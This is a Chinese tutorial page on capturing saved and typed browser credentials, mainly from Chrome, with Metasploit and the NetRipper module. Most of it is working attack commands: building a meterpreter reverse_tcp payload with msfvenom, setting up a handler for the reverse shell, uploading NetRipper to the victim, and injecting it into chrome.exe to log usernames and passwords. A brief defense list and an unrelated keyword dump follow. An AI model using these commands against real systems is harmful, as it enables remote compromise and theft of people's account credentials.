如何进行Metasploit+NetRipper获取Chrome等浏览器帐号密码测试
发表于:2025-01-19 作者:千家信息网编辑
千家信息网最后更新 2025年01月19日,如何进行Metasploit+NetRipper获取Chrome等浏览器帐号密码测试,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能
千家信息网最后更新 2025年01月19日如何进行Metasploit+NetRipper获取Chrome等浏览器帐号密码测试1.下载并且配置NetRipper
5.测试验证
如何进行Metasploit+NetRipper获取Chrome等浏览器帐号密码测试,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。
前言
我将手把手教会各位Buffer如何使用Metasploit+NetRipper获取Chrome等浏览器内保存的帐号密码。
需要工具:
Kali Linux&Metasploit
NetRipper
1.下载并且配置NetRipper
git clone https://github.com/NytroRST/NetRipper.git
mkdir /usr/share/metasploit-framework/modules/post/windows/gather/netripper
cp netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/netripper/
cp DLL.x86.dll NetRipper.x86.exe /usr/share/metasploit-framework/modules/post/windows/gather/netripper/
cp DLL.x64.dll NetRipper.x64.exe /usr/share/metasploit-framework/modules/post/windows/gather/netripper/
2.生成Windows的Payload用于建立于目标机器的连接
msfvenom -p windows/meterpreter/reverse_tcp LHOST=You IP LPORT=XXXX -f exe > Payload.exe
3.启动Metasploit并且进行监听
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST IP
set LPORT 6666
options
exploit
目标机运行Payload获取到反弹shell
4.上传DLL和exe文件到目标机器的C:\Users\Administrator\AppData\Local\Temp目录下
Upload /root/Desjtop/NetRipper/x64/DLL.dllUpload /root/Desjtop/NetRipper/x64/NetRipper.exe
shell
NetRipper.exe
运行NetRipper.exe
NetRipper.exe -w DLL.dll -l TEMP -p true -d 4096 -s user,pass
NetRipper.exe ConfiguredDLL.dll chrome.exe
我注入到了是chrome浏览器的进程,你也可以注入到其他浏览器(火狐,QQ浏览器,360浏览器等等)的进程,这里以Chrom浏览器为主
5.测试验证
打开那个刚刚下载的txt文件
Ctir+F输入pwpw或者pwd、pass、password等关键词来搜索明文密码
如果获取失败帐号密码的话,可能是网站使用了Https协议,或者登陆时在本地就进行了帐号口令的一个加密混淆!(个人推断) 防范方法:
1.不要点击来历不明的文件
2.浏览器登录可以扫描就扫描登录
3.如果没有必要个人建议不要在浏览器保存自己的社交帐号密码
看完上述内容是否对您有帮助呢?如果还想对相关知识有进一步的了解或阅读更多相关文章,请关注行业资讯频道,感谢您对的支持。
浏览器
浏览
密码
帐号
文件
目标
测试
个人
机器
进程
帮助
登录
运行
清楚
必要
手把手
来历不明
关键
关键词
内容
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
镇 网络安全工作总结
英语离线数据库
延庆区网络技术服务直销价
九游和4399服务器
海口市网络安全宣传
互联网科技热榜
注塑机控制软件开发的使用效果
澳门网络安全演习
pyqt操作数据库卡顿
硬件开发难还是软件开发难
冲撞广播剧软件开发
数据库修复怎么样
数据库变化后ef怎么变化
广播剧下载软件开发
我们服务器立足北美
怀旧服开多少个服务器
邯郸全国软件开发培训班
汉王考勤机sql数据库
中级软件开发工程师认证证书
oa服务器储存管理
电脑时钟同步服务器
网络安全审计检查
php数据库后台密码是
软件服务器端口
mac如何搭建git服务器
网络安全科研人员泣不成声
软件开发需要多少学费
网络安全攻击实战
复制数据库中的一个表格
2021网络安全答题题库